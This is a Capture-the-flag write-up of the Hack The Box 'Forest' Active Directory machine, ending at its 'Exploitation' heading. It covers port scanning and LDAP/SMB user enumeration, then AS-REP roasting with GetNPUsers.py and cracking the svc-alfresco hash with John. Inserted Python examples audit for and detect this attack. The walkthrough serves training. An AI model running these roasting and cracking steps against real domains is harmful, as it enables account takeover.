Hack The Box: Forest Write-up (#42)

Joshua Surendran
16 min read · Nov 21, 2020

This is my last box out of the 42 boxes I planned for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. Here is the list of TJ_Null’s OSCP-like VMs (those in green colour) that I have been working on.

So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator.sh 10.10.10.161 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

Running all scans on 10.10.10.161

Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:39 +08
Nmap scan report for 10.10.10.161
Host is up (0.014s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:39 +08
Nmap scan report for 10.10.10.161
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:46:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E6771%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m29s, median: 6m49s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-09-13T11:48:47-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-13T18:48:49
|_ start_date: 2020-09-13T02:34:56
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.71 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Warning: 10.10.10.161 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.161
Host is up (0.0085s latency).
Not shown: 976 open|filtered ports, 21 closed ports
PORT STATE SERVICE
123/udp open ntp
389/udp open ldap
57958/udp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.85 seconds
Making a script scan on UDP ports: 123, 389, 57958

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Nmap scan report for 10.10.10.161
Host is up (0.0096s latency).
PORT STATE SERVICE VERSION
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
57958/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port57958-UDP:V=7.80%I=7%D=9/14%Time=5F5E68A4%P=x86_64-pc-linux-gnu%r(N
SF:BTStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAAA\0\0!\0\x01");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.77 seconds
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Initiating Parallel DNS resolution of 1 host. at 02:44
Completed Parallel DNS resolution of 1 host. at 02:44, 0.01s elapsed
Initiating SYN Stealth Scan at 02:44
Scanning 10.10.10.161 [65535 ports]
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 23.34% done; ETC: 02:47 (0:01:42 remaining)
Discovered open port 49703/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 46.22% done; ETC: 02:47 (0:01:11 remaining)
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 69.06% done; ETC: 02:47 (0:00:41 remaining)
Discovered open port 49671/tcp on 10.10.10.161
Discovered open port 49958/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 49669/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Completed SYN Stealth Scan at 02:47, 131.44s elapsed (65535 total ports)
Nmap scan report for 10.10.10.161
Host is up (0.0078s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49703/tcp open unknown
49958/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 131.53 seconds
Raw packets sent: 65714 (2.891MB) | Rcvd: 65650 (2.626MB)
Making a script scan on extra ports: 5985, 9389, 47001, 49664, 49665, 49666, 49669, 49671, 49676, 49677, 49684, 49703, 49958

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:47 +08
Nmap scan report for 10.10.10.161
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49958/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds
---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:48 +08
Nmap scan report for 10.10.10.161
Host is up (0.010s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:54:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49958/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E696C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.35 seconds
Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:50 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.161
Host is up (0.010s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:57:54Z)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp open kpasswd5?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp open tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3269/tcp open tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49665/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49666/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49669/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49671/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49677/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49684/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49703/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49958/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E6A1E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 371.74 seconds

We have 24 TCP ports open (plus three UDP ports).

  • Port 53: running DNS (UDP port 57958 also answered as DNS)
  • Port 88: running Microsoft Windows Kerberos
  • Ports 139 and 445: running SMB
  • Ports 389 and 3268: running Microsoft Windows Active Directory LDAP
  • Port 464: running kpasswd5
  • Ports 593 and 49676: running ncacn_http (RPC over HTTP)
  • Ports 636 and 3269: reported as tcpwrapped (LDAPS and the Global Catalog over TLS)
  • Port 5985: running wsman
  • Port 47001: running winrm
  • Port 9389: running .NET Message Framing (AD Web Services)
  • Ports 135, 49664, 49665, 49666, 49669, 49671, 49677, 49684, 49703, 49958: running Microsoft Windows RPC
  • Port 123 (UDP): running NTP

Before we move to the enumeration phase, let’s make quick mental notes about the scan results.

  1. Since Kerberos and LDAP services are running, chances are we’re dealing with a Windows Active Directory Box.
  2. The Nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS discovery script leaks the operating system: Windows Server 2016 Standard 14393.
  3. Port 389 is running LDAP. We’ll need to query it for any useful information. Same goes for SMB.
  4. The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.
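The four notes above are really a small set of rules over the port list: Kerberos plus LDAP plus the Global Catalog means a domain controller, 5985/47001 means WinRM is reachable, and the 49xxx ports are RPC endpoint-mapper allocations. The script below is an added example, not part of the original write-up or of nmapAutomator; it parses the "PORT STATE SERVICE" lines from the scan above (copied inline so it runs offline) and derives those conclusions programmatically. The port-to-role table is my own assumption about what each service implies.

```python
"""Summarise an Nmap 'PORT STATE SERVICE' listing into a host-role assessment."""
import re
from collections import defaultdict

# Constructed input: open ports reported for 10.10.10.161 in the scan above,
# copied into a string so the script runs without a target.
SAMPLE_SCAN = """\
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
123/udp open ntp
389/udp open ldap
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Assumed mapping from well-known port to the role it indicates. A domain
# controller normally exposes every "dc" marker at once.
ROLE_MARKERS = {
    88: ("dc", "Kerberos KDC"),
    464: ("dc", "kpasswd"),
    389: ("dc", "LDAP"),
    636: ("dc", "LDAPS"),
    3268: ("dc", "Global Catalog"),
    3269: ("dc", "Global Catalog over TLS"),
    9389: ("dc", "AD Web Services"),
    53: ("dns", "DNS"),
    445: ("smb", "SMB"),
    139: ("smb", "NetBIOS session"),
    5985: ("remote", "WinRM (HTTP)"),
    47001: ("remote", "WinRM listener"),
}


def parse_open_ports(text):
    """Return (port, proto, service) for every line whose state is 'open'."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return ports


def assess(ports):
    """Group open ports by role and decide whether the host looks like a DC."""
    by_role = defaultdict(list)
    for port, proto, service in ports:
        role, label = ROLE_MARKERS.get(port, ("other", service))
        by_role[role].append((port, proto, label))
    dc_ports = {p for p, _, _ in by_role["dc"]}
    # Require the KDC, LDAP and the Global Catalog before calling it a DC.
    is_dc = {88, 389, 3268}.issubset(dc_ports)
    # Dynamic RPC endpoints live in the ephemeral range on Windows.
    ephemeral_rpc = sum(1 for p, proto, _ in ports if proto == "tcp" and p >= 49152)
    return {
        "likely_domain_controller": is_dc,
        "remote_management": bool(by_role["remote"]),
        "smb": bool(by_role["smb"]),
        "dc_markers": sorted(dc_ports),
        "ephemeral_rpc_ports": ephemeral_rpc,
        "total_open": len(ports),
    }


if __name__ == "__main__":
    for key, value in assess(parse_open_ports(SAMPLE_SCAN)).items():
        print(f"{key}: {value}")
```

Feeding it the full 24-port list instead of the abbreviated sample changes only the counts; the role verdicts stay the same, which is the point: the decision rests on a handful of well-known ports, not on the noise from the ephemeral range.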

Service Enumeration

We’ll start by enumerating LDAP.

Port 389 (LDAP)

Let’s use ldapsearch tool to find any useful information on port 389.

ldapsearch -x -h 10.10.10.161 -s base namingContexts

We get back the following results.

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1

We have the namingContexts info. Next, run another query to enumerate objects of class person.

ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local" '(objectClass=Person)' | grep givenName

We get back the following results.

givenName: Sebastien
givenName: Lucinda
givenName: Andy
givenName: Mark
givenName: Santi

We have five usernames. Save these names on our Kali Linux machine; we might need them to brute-force credentials.

Port 139 & 445 (SMB)

We’ll run enum4linux, which is a tool for enumerating information from Windows and Samba systems. It’s a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup. With special configuration, you can even have it query LDAP.

enum4linux 10.10.10.161 > enum4linux-results.txt

We get a list of domain users.

...
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group 'Domain Users' (RID: 513) has member: HTB\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\lucinda
Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group 'Domain Users' (RID: 513) has member: HTB\andy
Group 'Domain Users' (RID: 513) has member: HTB\mark
Group 'Domain Users' (RID: 513) has member: HTB\santi
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
...

We have an additional username, svc-alfresco; add this name to the username list. Now I have a bunch of usernames but no passwords. If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers Impacket script to send a dummy authentication request. The Key Distribution Centre (KDC) will then return a Ticket Granting Ticket (TGT) encrypted with a key derived from the user’s password. From there, we can take the encrypted TGT and run it through John or Hashcat to crack the password.
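Whether an account is exposed this way is a single attribute: the DONT_REQ_PREAUTH bit (0x400000) in userAccountControl. A defender can audit for it with the same ldapsearch output used above, which is what the added example below does; it is not code from the write-up. It parses LDIF (including folded and base64-encoded attribute values), decodes the userAccountControl flags and lists enabled accounts that do not require pre-authentication. The LDIF sample is constructed: the DNs, the description and the userAccountControl values are illustrative, not the real values from the box.

```python
"""Find accounts exposed to AS-REP roasting from an ldapsearch LDIF dump."""
import base64

# userAccountControl bits relevant to this check (Microsoft's documented UF_* flags).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH = 0x0002, 0x10000, 0x400000

# Constructed LDIF in the shape ldapsearch prints for
#   ldapsearch -x -b "DC=htb,DC=local" '(objectClass=person)' sAMAccountName userAccountControl
# DNs, description and flag values are made up for the example.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
dn: CN=Sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
description:: U2VydmljZSBhY2NvdW50
 IGZvciBBbGZyZXNjbw==
userAccountControl: 4260352

dn: CN=contractor,CN=Users,DC=htb,DC=local
sAMAccountName: contractor
userAccountControl: 4194818

# search result
search: 2
result: 0 Success
"""


def unfold(lines):
    """LDIF folds long values onto following lines that start with one space."""
    out = []
    for line in lines:
        if line.startswith(" ") and out:
            out[-1] += line[1:]
        else:
            out.append(line)
    return out


def parse_ldif(text):
    """Return a list of entries; each entry maps attribute -> list of values."""
    entries, current = [], {}
    for line in unfold(text.splitlines()):
        if line.startswith("#"):
            continue
        if not line.strip():
            if "dn" in current:          # ignore trailer blocks such as 'search:'/'result:'
                entries.append(current)
            current = {}
            continue
        if ":: " in line:                # base64-encoded value
            attr, value = line.split(":: ", 1)
            value = base64.b64decode(value).decode("utf-8", "replace")
        elif ": " in line:
            attr, value = line.split(": ", 1)
        elif line.endswith(":"):         # empty value, e.g. the root DSE 'dn:'
            attr, value = line[:-1], ""
        else:
            continue
        current.setdefault(attr, []).append(value)
    if "dn" in current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_exposed(entries):
    """(sAMAccountName, details) for enabled accounts that do not require pre-auth."""
    findings = []
    for e in entries:
        if "userAccountControl" not in e or "sAMAccountName" not in e:
            continue
        uac = int(e["userAccountControl"][0])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            findings.append((e["sAMAccountName"][0], {
                "password_never_expires": bool(uac & DONT_EXPIRE_PASSWORD),
                "flags": decode_uac(uac),
            }))
    return findings


if __name__ == "__main__":
    for name, details in asrep_exposed(parse_ldif(SAMPLE_LDIF)):
        print(name, details)
```

The disabled "contractor" account is deliberately excluded: its flag is still worth cleaning up, but it cannot be roasted while disabled. The fix for a hit is to clear the flag on the account (it exists almost only for legacy clients) and, for a service account with a never-expiring password, to rotate that password.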

Run the following command, requesting the encrypted TGT in John’s hash format.

GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request -format john

We get back the following results.

It seems the Kerberos pre-authentication option is disabled for the user svc-alfresco, and the KDC gave us back a TGT encrypted with the user’s password.

Save the encrypted TGT in the file tgthash.txt.

root@kali:/htb/Forest# cat tgthash.txt 
$krb5asrep$svc-alfresco@HTB.LOCAL:42390a998bc2827292fe7f51fb42dcd0$d9ea23e45e65a415bb838b64adf60d0a108ab14152fadccc87d413b32a79261c9fcbdc327451afb7e36412130cfdbcb6f087fbd3f885f4b59923a1d314a77e6c3feadf8d6e41de479fdb190e5a9cc9b02ca560f5c48427d1df907275b9bec5d07dca2c18f306e18df921beb913c5b892b0ee1d0058014d3a7be543a731ed8210d3b1afd19dda9fea40e123d8847b2df57e923c129beb3903a60ee2968807f58585bacaab283db536c89799aac347a1c0abf3469de038647b551285e3cda1078870d62dcc257e97130d53cf77f3679c1b3b3ec32a9fca6be2d8fc307ea0d16c4f84ee78ec7c8d

Crack the password using John the Ripper.

john --wordlist=/usr/share/wordlists/rockyou.txt tgthash.txt

John successfully cracked the password.

root@kali:/htb/Forest# john --show tgthash.txt 
$krb5asrep$svc-alfresco@HTB.LOCAL:s3rvice
1 password hash cracked, 0 left
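From the domain controller’s side, the request that produced the hash above is an ordinary Kerberos AS request and is logged as Event ID 4768 with Pre-Authentication Type 0; roasting tools additionally ask for RC4 (Ticket Encryption Type 0x17) because that hash cracks fastest. The added example below, not part of the write-up, runs that detection over a few constructed 4768 records (the field names follow the Windows event, the values are made up except for 10.10.14.31, the attacking host in this write-up) and groups the hits by source address.

```python
"""Flag AS-REP roasting activity in Windows Security log records (Event ID 4768)."""
from collections import defaultdict

# Constructed records carrying the Event 4768 fields this check needs; not real
# logs from the box. 10.10.14.31 is the attacking host used in the write-up,
# the other addresses and the 'contractor' account are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "sebastien", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50",
     "TimeCreated": "2020-09-13T18:50:01"},
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.31",
     "TimeCreated": "2020-09-13T18:50:05"},
    {"EventID": 4768, "TargetUserName": "contractor", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.31",
     "TimeCreated": "2020-09-13T18:50:06"},
    {"EventID": 4768, "TargetUserName": "EXCH01$", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.10",
     "TimeCreated": "2020-09-13T18:50:07"},
    # A TGS request (4769) for the same account is not an AS-REP roast.
    {"EventID": 4769, "TargetUserName": "svc-alfresco", "PreAuthType": "-",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.31",
     "TimeCreated": "2020-09-13T18:50:09"},
]

RC4_HMAC = "0x17"  # etype 23


def asrep_roast_hits(events):
    """One finding per 4768 event that was answered without pre-authentication."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("PreAuthType") != "0":
            continue
        rc4 = ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
        hits.append({
            "account": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "time": ev["TimeCreated"],
            # RC4 means the client asked for the weakest etype, typical of roasting tools.
            "severity": "high" if rc4 else "medium",
        })
    return hits


def accounts_per_source(hits):
    """One source collecting AS-REPs for several accounts is a strong signal."""
    per_ip = defaultdict(set)
    for h in hits:
        per_ip[h["source"]].add(h["account"])
    return {ip: sorted(names) for ip, names in per_ip.items()}


if __name__ == "__main__":
    hits = asrep_roast_hits(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print(accounts_per_source(hits))
```

Pre-Authentication Type 0 on its own is a legitimate, if rare, configuration, so the alert is most useful when paired with the RC4 etype or with one source address touching several accounts in a short window; the durable fix is the one from the previous example, re-enabling pre-authentication on the affected accounts.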

Exploitation

